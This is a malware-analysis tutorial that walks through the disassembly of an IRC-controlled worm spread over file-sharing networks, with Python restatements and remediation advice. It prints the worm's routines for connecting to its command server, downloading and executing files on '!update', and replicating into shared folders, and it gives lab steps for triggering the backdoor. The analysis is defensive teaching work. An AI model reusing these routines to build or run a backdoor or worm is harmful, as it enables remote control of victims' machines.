The code starts by creating a TCP socket (address family 2 is AF_INET, type 1 is SOCK_STREAM and protocol 6 is IPPROTO_TCP). It then connects to "tbc3.hanged.tk" using the sockaddr struct initialized before. If the call fails, the malware sleeps for 10 seconds and tries again until it succeeds or the process is terminated. Another function is then called twice, and the pointers it returns are used as the nick and user name for the IRC connection. A lot of malware uses IRC servers to provide backdoors to attackers, since the infected system does not need to listen on a specific port. The function in question seems to create a nickname and a user name. It takes two arguments, one being a pointer to memory and the second a number, perhaps the size of the memory pointed to by the first parameter. Here's the code of the function (only the interesting part):
.text:004012A3 mov ebx, [ebp+arg_0]
.text:004012A6 push [ebp+arg_4]
.text:004012A9 push ebx
.text:004012AA call RtlZeroMemory
.text:004012AF call rand
.text:004012B4 mov ecx, 6
.text:004012B9 cdq
.text:004012BA idiv ecx
.text:004012BC mov edi, edx
.text:004012BE add edi, 4
.text:004012C1 mov [ebp+var_4], edi
.text:004012C4 mov eax, [ebp+arg_4]
.text:004012C7 cmp edi, eax
.text:004012C9 jl short loc_4012CF
.text:004012CB dec eax
.text:004012CC mov [ebp+var_4], eax
.text:004012CF
.text:004012CF loc_4012CF: ; CODE XREF: sub_40129C+2D
.text:004012CF xor esi, esi
.text:004012D1 jmp short loc_4012EB
.text:004012D3 ; ---------------------------------------------------------------------------
.text:004012D3
.text:004012D3 loc_4012D3: ; CODE XREF: sub_40129C+52
.text:004012D3 call rand
.text:004012D8 mov ecx, 1Ah
.text:004012DD cdq
.text:004012DE idiv ecx
.text:004012E0 mov edi, edx
.text:004012E2 add edi, 61h
.text:004012E5 mov edx, edi
.text:004012E7 mov [ebx+esi], dl
.text:004012EA inc esi
.text:004012EB
.text:004012EB loc_4012EB: ; CODE XREF: sub_40129C+35
.text:004012EB cmp esi, [ebp+var_4]
.text:004012EE jl short loc_4012D3
.text:004012F0 mov byte ptr [esi+ebx+1], 0
.text:004012F5 mov eax, ebx
The function uses RtlZeroMemory to set the content of the target memory to zero. The second argument is indeed used as the size of the block. Afterwards a pseudo-random number is created. The subroutine calculates the remainder of the random number when divided by 6 using the "idiv" instruction and adds 4 to it, which results in a number in the range from 4 to 9. This number is compared to the size of the memory block, and if it is not smaller than the size, it is replaced by (size - 1). So the created number seems to be the length of the string to be created. This code is followed by a loop which repeatedly creates pseudo-random numbers, takes the remainder when divided by 0x1A, adds 0x61 and stores the resulting bytes in the memory. Effectively this loop creates lowercase ASCII characters, since 0x61 is the ASCII code of 'a' and 0x1A (26) is the length of the Latin alphabet. The result is a string of 4 to 9 random lowercase characters. So the malware connects to a hard-coded IRC server using a random nick and user name. After logging in, it enters a loop that receives data from the server.
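The name generator is simple enough to restate in Python. The sketch below follows the arithmetic of the listing; the function name random_name is made up, and rng.randrange(0x8000) merely stands in for the C rand() call, whose exact range in the lcc runtime is an assumption here.

```python
import random


def random_name(size: int, rng: random.Random) -> str:
    """Generate a random lowercase name the way sub_40129C does (sketch)."""
    length = rng.randrange(0x8000) % 6 + 4          # 4..9
    if length >= size:                              # does not fit the buffer
        length = size - 1
    # Each character is 'a' (0x61) plus a remainder in the range 0..25.
    return "".join(chr(rng.randrange(0x8000) % 0x1A + 0x61) for _ in range(length))


rng = random.Random(1234)  # fixed seed so repeated runs give the same names
print(random_name(0x100, rng), random_name(0x100, rng))
```

With the buffer size 0x100 used by the worm, the length cap never triggers, so nick and user name always consist of 4 to 9 lowercase letters. That makes the names random but not very distinctive, so they are of little use as a detection signature on their own.

The listing that follows shows the start of the worm's receive loop.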
.text:00402D08 push 100h
.text:00402D0D lea eax, [ebp+String]
.text:00402D13 push eax
.text:00402D14 call RtlZeroMemory
.text:00402D19 jmp loc_402F09
.text:00402D1E ; ---------------------------------------------------------------------------
.text:00402D1E
.text:00402D1E loc_402D1E: ; CODE XREF: sub_4029B3+56C
.text:00402D1E push offset aPing ; "PING "
.text:00402D23 lea eax, [ebp+String]
.text:00402D29 push eax
.text:00402D2A call sub_40304C
.text:00402D2F add esp, 8
.text:00402D32 mov edi, eax
.text:00402D34 or eax, eax
.text:00402D36 jz short loc_402D91
.text:00402D38 push offset asc_4058C1 ; ":"
.text:00402D3D push edi
.text:00402D3E call strtok
.text:00402D43 push offset asc_4058BE ; "\r\n"
.text:00402D48 push 0
.text:00402D4A call strtok
.text:00402D4F mov edi, eax
.text:00402D51 push offset aTibicP2p3 ; "##TIBiC-P2P3##"
.text:00402D56 push offset aTibicP2p3 ; "##TIBiC-P2P3##"
.text:00402D5B push edi
.text:00402D5C push offset aPongSJoinS ; "PONG :%s\r\nJOIN %s\r\n"
.text:00402D61 lea eax, [ebp+String]
.text:00402D67 push eax
.text:00402D68 call wsprintfA
.text:00402D6D add esp, 24h
.text:00402D70 lea eax, [ebp+String]
.text:00402D76 push eax ; lpString
.text:00402D77 call lstrlenA
.text:00402D7C push 0 ; flags
.text:00402D7E push eax ; len
.text:00402D7F lea edx, [ebp+String]
.text:00402D85 push edx ; buf
.text:00402D86 push esi ; s
.text:00402D87 call send
If a "PING" is received (after the worm has logged in), the malware answers it with a "PONG" and joins the channel "##TIBiC-P2P3##", which is the other checked string. Some other comparisons with the received response are done after that:
.text:00402D91 push offset aPrivmsg ; "PRIVMSG "
.text:00402D96 lea eax, [ebp+String]
.text:00402D9C push eax
.text:00402D9D call sub_40304C
.text:00402DA2 add esp, 8
.text:00402DA5 mov edi, eax
.text:00402DA7 or eax, eax
.text:00402DA9 jz loc_402F09
.text:00402DAF push offset asc_4058C1 ; ":"
.text:00402DB4 push edi
.text:00402DB5 call strstr
.text:00402DBA add esp, 8
.text:00402DBD or eax, eax
.text:00402DBF jz loc_402F09
.text:00402DC5 push offset asc_4058C1 ; ":"
.text:00402DCA push edi
.text:00402DCB call strtok
.text:00402DD0 push offset asc_4058BE ; "\r\n"
.text:00402DD5 push 0
.text:00402DD7 call strtok
.text:00402DDC add esp, 10h
.text:00402DDF mov edi, eax
.text:00402DE1 cmp byte ptr [edi], 21h
.text:00402DE4 jnz loc_402F09
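The checks in the listing above can be summarized in a few lines of Python. This is a sketch under assumptions, not the worm's code: sub_40304C is again assumed to work like strstr, the function name extract_command is made up, and the two strtok calls are approximated with partition and a regular expression.

```python
import re


def extract_command(received):
    """Return the message text if it starts with '!', otherwise None."""
    pos = received.find("PRIVMSG ")          # assumed behaviour of sub_40304C
    if pos < 0:
        return None
    # strstr/strtok with ":": everything after the first colon is the text.
    _, colon, text = received[pos:].partition(":")
    if not colon:
        return None
    # strtok(NULL, "\r\n"): skip leading CR/LF, then cut at the next one.
    message = re.split(r"[\r\n]", text.lstrip("\r\n"), maxsplit=1)[0]
    # cmp byte ptr [edi], 21h: only texts starting with '!' are handled.
    if not message.startswith("!"):
        return None
    return message


if __name__ == "__main__":
    # Nick, user and host in this line are made up for the example.
    print(extract_command(":boss!u@h PRIVMSG ##TIBiC-P2P3## :!exit\r\n"))
```

Everything that does not pass these checks makes the original code jump to loc_402F09, which corresponds to returning None here.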
This part of the code compares the received command with "PRIVMSG", which is sent when the client receives a private message. The response is then searched for a colon to find the beginning of the message text. The first char is compared to 0x21, which represents the '!' sign. So the exclamation mark seems to indicate the beginning of a special backdoor command. As we will see, the malware knows only two commands: "!exit" and "!update". Obviously the "!exit" command ends the malware process until the infected machine is restarted. The "!update" command leads to the execution of this code:
.text:00402E24 push 0FFh ; uSize
.text:00402E29 lea eax, [ebp+buf]
.text:00402E2F push eax ; lpBuffer
.text:00402E30 call GetSystemDirectoryA
.text:00402E35 mov [ebp+var_4C0], esi
.text:00402E3B and [ebp+var_4BC], 0
.text:00402E42 push edi
.text:00402E43 push offset aS ; "%s"
.text:00402E48 lea eax, [ebp+Parameter]
.text:00402E4E push eax
.text:00402E4F call wsprintfA
.text:00402E54 push 100h
.text:00402E59 lea eax, [ebp+var_314]
.text:00402E5F push eax
.text:00402E60 call sub_40129C
.text:00402E65 push eax
.text:00402E66 lea edx, [ebp+buf]
.text:00402E6C push edx
.text:00402E6D push offset aSS_exe ; "%s\\%s.exe"
.text:00402E72 lea edx, [ebp+var_5C0]
.text:00402E78 push edx
.text:00402E79 call wsprintfA
.text:00402E7E add esp, 24h
.text:00402E81 lea eax, [ebp+ThreadId]
.text:00402E87 push eax ; lpThreadId
.text:00402E88 push 0 ; dwCreationFlags
.text:00402E8A lea eax, [ebp+Parameter]
.text:00402E90 push eax ; lpParameter
.text:00402E91 push offset sub_401347 ; lpStartAddress
.text:00402E96 push 0 ; dwStackSize
.text:00402E98 push 0 ; lpThreadAttributes
.text:00402E9A call CreateThread
.text:00402E9F jmp short loc_402EA8
Again the function to create a random name is called. The resulting string is then passed to wsprintfA, which builds a string of the following form: "$system_directory\$random.exe". So the "!update" command somehow makes the malware create an executable, probably downloaded from the web. Subsequently a new thread is created, with the start address of another function (not a full listing):
.text:00401366 mov dword ptr [ebx+204h], 1
.text:00401370 push 0
.text:00401372 push 0
.text:00401374 push 0
.text:00401376 push 0
.text:00401378 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
.text:0040137D call InternetOpenA
.text:00401382 mov [ebp+var_418], eax
.text:00401388 push 0
.text:0040138A push 0
.text:0040138C push 0
.text:0040138E push 0
.text:00401390 lea eax, [ebp+var_414]
.text:00401396 push eax
.text:00401397 push [ebp+var_418]
.text:0040139D call InternetOpenUrlA
.text:004013A2 mov ebx, eax
.text:004013A4 or ebx, ebx
.text:004013A6 jz loc_4014D0
.text:004013AC push 0 ; hTemplateFile
.text:004013AE push 0 ; dwFlagsAndAttributes
.text:004013B0 push 2 ; dwCreationDisposition
.text:004013B2 push 0 ; lpSecurityAttributes
.text:004013B4 push 0 ; dwShareMode
.text:004013B6 push 40000000h ; dwDesiredAccess
.text:004013BB lea eax, [ebp+File]
.text:004013C1 push eax ; lpFileName
.text:004013C2 call CreateFileA
.text:004013C7 mov [ebp+hObject], eax
.text:004013CD cmp eax, 1
.text:004013D0 jnb short loc_401414
.text:004013D2 push offset aTibicP2p3 ; "##TIBiC-P2P3##"
.text:004013D7 push offset aPrivmsgSUpdate ; "PRIVMSG %s :Update error: File write er"...
.text:004013DC lea eax, [ebp+buf]
.text:004013E2 push eax
.text:004013E3 call wsprintfA
.text:004013E8 add esp, 0Ch
.text:004013EB lea eax, [ebp+buf]
.text:004013F1 push eax ; lpString
.text:004013F2 call lstrlenA
.text:004013F7 push 0 ; flags
.text:004013F9 push eax ; len
.text:004013FA lea edi, [ebp+buf]
.text:00401400 push edi ; buf
.text:00401401 push [ebp+s] ; s
.text:00401407 call send
.text:0040140C xor eax, eax
.text:0040140E inc eax
.text:0040140F jmp loc_4014D8
.text:00401414 ; ---------------------------------------------------------------------------
.text:00401414
.text:00401414 loc_401414: ; CODE XREF: sub_401347+89
.text:00401414 ; sub_401347+124
.text:00401414 push 200h
.text:00401419 push 0
.text:0040141B lea eax, [ebp+Buffer]
.text:00401421 push eax
.text:00401422 call memset
.text:00401427 add esp, 0Ch
.text:0040142A lea eax, [ebp+nNumberOfBytesToWrite]
.text:00401430 push eax
.text:00401431 push 200h
.text:00401436 lea eax, [ebp+Buffer]
.text:0040143C push eax
.text:0040143D push ebx
.text:0040143E call InternetReadFile
.text:00401443 push 0 ; lpOverlapped
.text:00401445 lea eax, [ebp+NumberOfBytesWritten]
.text:0040144B push eax ; lpNumberOfBytesWritten
.text:0040144C push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
.text:00401452 lea eax, [ebp+Buffer]
.text:00401458 push eax ; lpBuffer
.text:00401459 push [ebp+hObject] ; hFile
.text:0040145F call WriteFile
.text:00401464 cmp [ebp+nNumberOfBytesToWrite], 0
.text:0040146B jnz short loc_401414
.text:0040146D push [ebp+hObject] ; hObject
.text:00401473 call CloseHandle
.text:00401478 push 5 ; nShowCmd
.text:0040147A push 0 ; lpDirectory
.text:0040147C push 0 ; lpParameters
.text:0040147E lea eax, [ebp+File]
.text:00401484 push eax ; lpFile
.text:00401485 push offset aOpen ; lpOperation
.text:0040148A push 0 ; hwnd
.text:0040148C call ShellExecuteA
The code of this function is quite clear. The thread downloads the file from the address passed as a parameter (the text that follows "!update ") using the WinInet API, writes it to disk and executes it. If the file cannot be written, an error message is sent with PRIVMSG to the channel "##TIBiC-P2P3##", where the IRC user that issued the "!update" command can read it.
The backdoor offers the attacker the possibility to run arbitrary code on the infected system with the rights of the logged-in user. This gives the attacker almost full control over the system, since too many Windows users work under an account with administrative rights.
If you want to check this behaviour of the malware yourself in your virtual machine, set up an IRC daemon, infect the virtual environment and edit system32\drivers\etc\hosts so that "tbc3.hanged.tk" resolves to the address of the machine running the IRC daemon. Now enter the channel with another IRC client and try sending "!exit" or "!update" to the malware (if you want to test the "!update" command without connecting the infected system to the internet, you should set up an HTTP daemon too).
We have now dissected and analyzed almost the complete executable. Only one part is left: the thread that was created before the malware connected to the IRC server. This is the thread's code:
.text:0040299B loc_40299B: ; CODE XREF: StartAddress+12
.text:0040299B call sub_4027F2
.text:004029A0 push 0EA60h ; dwMilliseconds
.text:004029A5 call Sleep
.text:004029AA jmp short loc_40299B
.text:004029AA StartAddress endp
So this thread calls a function, waits 1 minute (0xEA60 = 60000 milliseconds) and starts over, in an endless loop. Let's analyze the function which is repeatedly called:
.text:0040283B push eax ; lpSubKey
.text:0040283C push 80000001h ; hKey
.text:00402841 call RegOpenKeyExA
.text:00402846 or eax, eax
.text:00402848 jnz short loc_402851
.text:0040284A mov [ebp+var_8], 1
...
.text:00402864 push offset aSoftwareImeshC ; lpSubKey
.text:00402869 push 80000001h ; hKey
.text:0040286E call RegOpenKeyExA
.text:00402873 or eax, eax
.text:00402875 jnz short loc_40287A
.text:00402877 xor edi, edi
.text:00402879 inc edi
...
.text:0040288D push offset aSoftwareMorphe ; lpSubKey
.text:00402892 push 80000002h ; hKey
.text:00402897 call RegOpenKeyExA
.text:0040289C or eax, eax
.text:0040289E jnz short loc_4028A3
.text:004028A0 xor esi, esi
.text:004028A2 inc esi
...
Some other calls to RegOpenKeyExA follow, but I think it's not necessary to list them here. This code excerpt checks for the existence of registry keys belonging to various file sharing programs. If a key exists, a specific variable or register is set to one. Some code later, these registers/variables are checked:
.text:0040292E cmp [ebp+var_8], 1
.text:00402932 jz short loc_40294F
.text:00402934 cmp edi, 1
.text:00402937 jz short loc_40294F
.text:00402939 cmp esi, 1
.text:0040293C jz short loc_40294F
.text:0040293E cmp ebx, 1
.text:00402941 jz short loc_40294F
.text:00402943 cmp [ebp+var_C], 1
.text:00402947 jz short loc_40294F
.text:00402949 cmp [ebp+var_10], 1
.text:0040294D jnz short loc_402954
.text:0040294F
.text:0040294F loc_40294F: ; CODE XREF: sub_4027F2+140
.text:0040294F ; sub_4027F2+145 ...
.text:0040294F call sub_4026BA
.text:00402954
.text:00402954 loc_402954: ; CODE XREF: sub_4027F2+15B
So if one of the file sharing programs is installed, the program calls the function located at 0x4026BA:
.text:004026BA push ebp
.text:004026BB mov ebp, esp
.text:004026BD sub esp, 400h
.text:004026C3 push ebx
.text:004026C4 push esi
.text:004026C5 push edi
.text:004026C6 push 0 ; lpModuleName
.text:004026C8 call GetModuleHandleA
.text:004026CD push 100h ; nSize
.text:004026D2 lea ebx, [ebp+Filename]
.text:004026D8 push ebx ; lpFilename
.text:004026D9 push eax ; hModule
.text:004026DA call GetModuleFileNameA
.text:004026DF push 100h ; uSize
.text:004026E4 lea eax, [ebp+Buffer]
.text:004026EA push eax ; lpBuffer
.text:004026EB call GetSystemDirectoryA
.text:004026F0 push dword_4040A4
.text:004026F6 lea eax, [ebp+Buffer]
.text:004026FC push eax
.text:004026FD push offset aSS ; "%s\\%s"
.text:00402702 lea eax, [ebp+PathName]
.text:00402708 push eax
.text:00402709 call wsprintfA
.text:0040270E add esp, 10h
.text:00402711 push 0 ; lpSecurityAttributes
.text:00402713 lea eax, [ebp+PathName]
.text:00402719 push eax ; lpPathName
.text:0040271A call CreateDirectoryA
This code again determines the system directory and the file name of the module. The system directory is then combined with the hard-coded string "msview" and passed to CreateDirectoryA, which creates a subfolder of the system directory named "msview". This code is followed by two similar loops. Here is the first one:
.text:0040271F xor edi, edi
.text:00402721 jmp short loc_40277B
.text:00402723 ; ---------------------------------------------------------------------------
.text:00402723
.text:00402723 loc_402723: ; CODE XREF: sub_4026BA+C9
.text:00402723 push dword_4041C8[edi*4]
.text:0040272A lea ebx, [ebp+PathName]
.text:00402730 push ebx
.text:00402731 push offset aSS ; "%s\\%s"
.text:00402736 lea ebx, [ebp+var_100]
.text:0040273C push ebx
.text:0040273D call wsprintfA
.text:00402742 mov ebx, dword_4040A8[edi*4]
.text:00402749 shl ebx, 0Ah
.text:0040274C push ebx
.text:0040274D lea ebx, [ebp+var_100]
.text:00402753 push ebx
.text:00402754 lea ebx, [ebp+Filename]
.text:0040275A push ebx
.text:0040275B call sub_4014DF
.text:00402760 add esp, 1Ch
.text:00402763 or eax, eax
.text:00402765 jnz short loc_402773
.text:00402767 push 3E8h ; dwMilliseconds
.text:0040276C call Sleep
.text:00402771 jmp short loc_40277A
.text:00402773 ; ---------------------------------------------------------------------------
.text:00402773
.text:00402773 loc_402773: ; CODE XREF: sub_4026BA+AB
.text:00402773 push 1 ; dwMilliseconds
.text:00402775 call Sleep
.text:0040277A
.text:0040277A loc_40277A: ; CODE XREF: sub_4026BA+B7
.text:0040277A inc edi
.text:0040277B
.text:0040277B loc_40277B: ; CODE XREF: sub_4026BA+67
.text:0040277B cmp dword_4041C8[edi*4], 0
.text:00402783 jnz short loc_402723
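The bookkeeping of this loop is easier to see in a few lines of Python. The sketch below only computes what the loop passes on to sub_4014DF. It is an illustration under assumptions: the function name plan_copies is made up, the file names in the usage note are placeholders (the real table contents are not shown in this article), and None stands in for the terminating 0 entry of the table at dword_4041C8.

```python
def plan_copies(names, sizes, target_dir):
    """Return (path, shifted value) pairs as the loop computes them."""
    plan = []
    for index, name in enumerate(names):
        if name is None:                       # cmp dword_4041C8[edi*4], 0
            break
        path = "%s\\%s" % (target_dir, name)   # wsprintfA with "%s\\%s"
        value = sizes[index] << 10             # shl ebx, 0Ah (times 1024)
        plan.append((path, value))
    return plan
```

With the placeholder tables ["a.exe", "b.exe", None] and [3, 10], the second element of each pair is 3072 and 10240 respectively.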
This loop traverses an array of DWORDs terminated by 0. Every element of the array is a pointer to a string, since it is used together with wsprintfA to format a path name at the beginning of the loop. There is a second array of DWORDs located at 0x4040A8 which seems to contain numbers. They are shifted left by 10 bits in the loop, which is equal to a multiplication by 2^10 = 1024. The module file name, the path built from the string in the first array and the multiplied value from the second array are then passed to sub_4014DF (only a small part of the function):
.text:0040156A push 0 ; lpFileSizeHigh
.text:0040156C push [ebp+hObject] ; hFile
.text:0040156F call GetFileSize
.text:00401574 mov [ebp+nNumberOfBytesToRead], eax
.text:00401577 call GetProcessHeap
.text:0040157C push [ebp+nNumberOfBytesToRead] ; dwBytes
.text:0040157F push 0 ; dwFlags
.text:00401581 push eax ; hHeap
.text:00401582 call HeapAlloc
.text:00401587 mov [ebp+lpMem], eax
.text:0040158A push 0 ; lpOverlapped
.text:0040158C lea eax, [ebp+NumberOfBytesRead]
.text:0040158F push eax ; lpNumberOfBytesRead
.text:00401590 push [ebp+nNumberOfBytesToRead] ; nNumberOfBytesToRead
.text:00401593 push [ebp+lpMem] ; lpBuffer
.text:00401596 push [ebp+hObject] ; hFile
.text:00401599 call ReadFile
.text:0040159E or eax, eax
.text:004015A0 jnz short loc_4015CA
.text:004015A2 call GetProcessHeap
.text:004015A7 push [ebp+lpMem] ; lpMem
.text:004015AA push 0 ; dwFlags
.text:004015AC push eax ; hHeap
.text:004015AD call HeapFree
.text:004015B2 push [ebp+hObject] ; hObject
.text:004015B5 call CloseHandle
.text:004015BA push [ebp+hFile] ; hObject
.text:004015BD call CloseHandle
.text:004015C2 xor eax, eax
.text:004015C4 inc eax
.text:004015C5 jmp loc_4016E1
.text:004015CA ; ---------------------------------------------------------------------------
.text:004015CA
.text:004015CA loc_4015CA: ; CODE XREF: sub_4014DF+C1
.text:004015CA xor ebx, ebx
.text:004015CC jmp short loc_40161E
.text:004015CE ; ---------------------------------------------------------------------------
.text:004015CE
.text:004015CE loc_4015CE: ; CODE XREF: sub_4014DF+147
.text:004015CE mov eax, [ebp+lpMem]
.text:004015D1 cmp byte ptr [eax+ebx], '-'
.text:004015D5 jnz short loc_40161D
.text:004015D7 cmp byte ptr [ebx+eax+1], '='
.text:004015DC jnz short loc_40161D
.text:004015DE cmp byte ptr [ebx+eax+2], '@'
.text:004015E3 jnz short loc_40161D
.text:004015E5 cmp byte ptr [ebx+eax+3], '#'
.text:004015EA jnz short loc_40161D
.text:004015EC cmp byte ptr [ebx+eax+4], 'E'
.text:004015F1 jnz short loc_40161D
.text:004015F3 cmp byte ptr [ebx+eax+5], 'O'
.text:004015F8 jnz short loc_40161D
.text:004015FA cmp byte ptr [ebx+eax+6], 'F'
.text:004015FF jnz short loc_40161D
.text:00401601 cmp byte ptr [ebx+eax+7], '#'
.text:00401606 jnz short loc_40161D
.text:00401608 cmp byte ptr [ebx+eax+8], '@'
.text:0040160D jnz short loc_40161D
.text:0040160F cmp byte ptr [ebx+eax+9], '='
.text:00401614 jnz short loc_40161D
.text:00401616 cmp byte ptr [ebx+eax+0Ah], '-'
.text:0040161B jz short loc_401628
.text:0040161D
.text:0040161D loc_40161D: ; CODE XREF: sub_4014DF+F6
.text:0040161D ; sub_4014DF+FD ...
.text:0040161D inc ebx
.text:0040161E
.text:0040161E loc_40161E: ; CODE XREF: sub_4014DF+ED
.text:0040161E mov eax, ebx
.text:00401620 add eax, 0Bh
.text:00401623 cmp eax, [ebp+nNumberOfBytesToRead]
.text:00401626 jb short loc_4015CE
.text:00401628
.text:00401628 loc_401628: ; CODE XREF: sub_4014DF+13C
.text:00401628 push 0 ; lpOverlapped
.text:0040162A lea eax, [ebp+NumberOfBytesWritten]
.text:0040162D push eax ; lpNumberOfBytesWritten
.text:0040162E push ebx ; nNumberOfBytesToWrite
.text:0040162F push [ebp+lpMem] ; lpBuffer
.text:00401632 push [ebp+hFile] ; hFile
.text:00401635 call WriteFile
This code reads an opened file completely. The file is the image of the process on disk. After that a loop follows which searches the contents just read for the pattern "-=@#EOF#@=-" and writes everything up to this signature to a second, newly created file. This mechanism is used by the worm to produce replicas with different file sizes. The "-=@#EOF#@=-" signature serves as a pattern that marks the end of the "real" executable. After that an additional amount of zeros is written to make the file size of the new copy differ:
.text:00401678 push [ebp+nNumberOfBytesToWrite] ; dwBytes
.text:0040167B push 0 ; dwFlags
.text:0040167D push eax ; hHeap
.text:0040167E call HeapAlloc
.text:00401683 mov [ebp+lpMem], eax
.text:00401686 push [ebp+nNumberOfBytesToWrite]
.text:00401689 push eax
.text:0040168A call RtlZeroMemory
.text:0040168F lea eax, [ebp+Buffer]
.text:00401692 push eax ; lpString
.text:00401693 call lstrlenA
.text:00401698 push 0 ; lpOverlapped
.text:0040169A lea edi, [ebp+NumberOfBytesWritten]
.text:0040169D push edi ; lpNumberOfBytesWritten
.text:0040169E push eax ; nNumberOfBytesToWrite
.text:0040169F lea edi, [ebp+Buffer]
.text:004016A2 push edi ; lpBuffer
.text:004016A3 push [ebp+hFile] ; hFile
.text:004016A6 call WriteFile
.text:004016AB push 0 ; lpOverlapped
.text:004016AD lea eax, [ebp+NumberOfBytesWritten]
.text:004016B0 push eax ; lpNumberOfBytesWritten
.text:004016B1 push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
.text:004016B4 push [ebp+lpMem] ; lpBuffer
.text:004016B7 push [ebp+hFile] ; hFile
.text:004016BA call WriteFile
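The marker described before this listing is also handy for an analyst who wants to look at a collected copy. The following Python sketch is a helper of that kind, not part of the worm: the function name describe_copy is made up, and it assumes that the copy still contains the marker (the listing writes a string from Buffer between the body and the zeros, but its content is not shown in this excerpt).

```python
MARKER = b"-=@#EOF#@=-"


def describe_copy(data):
    """Split a file image at the marker and describe what follows it."""
    offset = data.find(MARKER)
    if offset < 0:
        return None                      # no marker: layout assumption fails
    tail = data[offset + len(MARKER):]
    return {
        "body_size": offset,             # bytes before the marker
        "tail_size": len(tail),          # bytes after the marker
        "tail_is_zero": not any(tail),   # True if the tail is only 0x00
    }


if __name__ == "__main__":
    # Synthetic example data, not a real sample.
    sample = b"MZ" + b"\x90" * 100 + MARKER + b"\x00" * (3 << 10)
    print(describe_copy(sample))
```

If the assumption about the marker does not hold for a given file, the function simply returns None instead of guessing.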
The amount of zeros to be written was given as an argument. So the two tables used in the replication loop denote the file names and the sizes to add to the file in kilobytes (the second loop in the replication procedure is similar). After replicating itself when a file sharing application is found, the worm takes some other actions:
.text:00402954 loc_402954: ; CODE XREF: sub_4027F2+15B
.text:00402954 cmp [ebp+var_8], 1
.text:00402958 jnz short loc_40295F
.text:0040295A call sub_4016E6
.text:0040295F
.text:0040295F loc_40295F: ; CODE XREF: sub_4027F2+166
.text:0040295F cmp edi, 1
.text:00402962 jnz short loc_402969
.text:00402964 call sub_401D2F
.text:00402969
.text:00402969 loc_402969: ; CODE XREF: sub_4027F2+170
.text:00402969 cmp esi, 1
.text:0040296C jnz short loc_402973
.text:0040296E call sub_401EB9
.text:00402973
.text:00402973 loc_402973: ; CODE XREF: sub_4027F2+17A
.text:00402973 cmp ebx, 1
.text:00402976 jnz short loc_40297D
.text:00402978 call sub_4020E7
.text:0040297D
.text:0040297D loc_40297D: ; CODE XREF: sub_4027F2+184
.text:0040297D cmp [ebp+var_C], 1
.text:00402981 jnz short loc_402988
.text:00402983 call sub_4022FB
.text:00402988
.text:00402988 loc_402988: ; CODE XREF: sub_4027F2+18F
.text:00402988 cmp [ebp+var_10], 1
.text:0040298C jnz short loc_402993
.text:0040298E call sub_4024E2
.text:00402993
Now a different function is called for each file sharing program. None of them is very interesting. They just change some config files or registry settings, e.g. to add the system32\msview directory, where the malware placed its copies, to the list of shared folders, or to speed up the spreading process by changing some upload settings.
So, after this analysis, we have a complete knowledge of what the malware does (without even running the binary). Here is a summary of what we found out:
It might seem that you could disinfect a system compromised by this malware by deleting the autostart entries and removing the created files, but you don't know which files have been executed by an attacker using the installed backdoor. For this reason, a system compromised by such a worm is not to be trusted and the only clean solution is to completely rebuild the system. Any data that was accessible to this system is not to be trusted either, for you can't know what other malicious code was run.
If you have feedback, suggestions and/or (constructive) criticism, send it to lesco[at]gmx[dot]de